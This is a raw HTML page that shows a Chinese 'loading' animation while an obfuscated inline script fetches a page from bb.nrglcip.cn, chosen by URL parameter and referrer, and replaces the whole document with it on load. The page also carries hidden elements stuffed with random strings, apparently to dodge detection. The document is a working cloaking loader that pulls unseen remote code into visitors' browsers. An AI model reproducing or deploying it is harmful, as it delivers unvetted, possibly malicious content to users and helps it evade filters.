<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .wdycZh7pyx {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .wdycZh7pyx .lGSUZM029 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .wdycZh7pyx .content {
            line-height: 50px;
            text-align: center
        }

        .wdycZh7pyx .img {
            width: 100%
        }

        .wdycZh7pyx .UBJjorLt3 {
            text-align: center
        }

        .wdycZh7pyx .UBJjorLt3 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .wdycZh7pyx .UBJjorLt3 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .wdycZh7pyx .UBJjorLt3 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .wdycZh7pyx .UBJjorLt3 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .wdycZh7pyx .UBJjorLt3 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .wdycZh7pyx .UBJjorLt3 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .wdycZh7pyx .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function GtV2zjE6Or3nB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var S0y6V = GtV2zjE6Or3nB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ S0y6V +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ S0y6V +".html?a=share";
		}
		
        l8dOfLG=url+"#"+new Date().getTime();
        l8dOfLG && function() {
            $.get(l8dOfLG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>EWyi2Cg2BKuuWWn725</div>
<b style='display:none' >njcPImalfrzY4YhwjTXKT</b>
<div style='display:none'>EWyi2Cg2BKuuWWn725</div>
<b style='display:none' >njcPImalfrzY4YhwjTXKT</b>
<h1 style='display:none' >XaWJWloAiPlEhx5h0LlKief1NFbHR1bpIY6GesGNMf4O5W8PNFCBivIWyFvjX0eZdv</h1>
<img  src='' style='display:none'>
<ul style='display:none' >wB6vCX1ny1PtkTGwnex49POCiV7jG9835HTi6Gpjm1ia8W</ul>
<ul style='display:none' >wB6vCX1ny1PtkTGwnex49POCiV7jG9835HTi6Gpjm1ia8W</ul>
<li style='display:none' >CPTOWP1qxXcefROgtDx9KA499bIIBd4g9nZbGgoYsmLkjG21zBEZGNyV0yJBqCyKamGa3E2SWnH9vwkwv7MhyGH7W1ZQa2mV3P</li><div class="wdycZh7pyx">
    <div class="lGSUZM029">
        <div class="UBJjorLt3">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >uFNL9r6hoxBcM4MJ4VzAuR6K8kBVtJEWrevw7jgb9wuZrzwAWs7Bt</b>
<li style='display:none' >U5auDDlGY1fQzUL4AMwV8FIvT4k7Ggw22NaOwGYEdqutLo5coW6lWBYODUtjvIpDbvVjyt6f</li>
<li style='display:none' >U5auDDlGY1fQzUL4AMwV8FIvT4k7Ggw22NaOwGYEdqutLo5coW6lWBYODUtjvIpDbvVjyt6f</li>
<ul style='display:none' >iCTHoKkZEcTMUticgsjmi90urHdTg7NNBWmzoGVV</ul></body>
</html>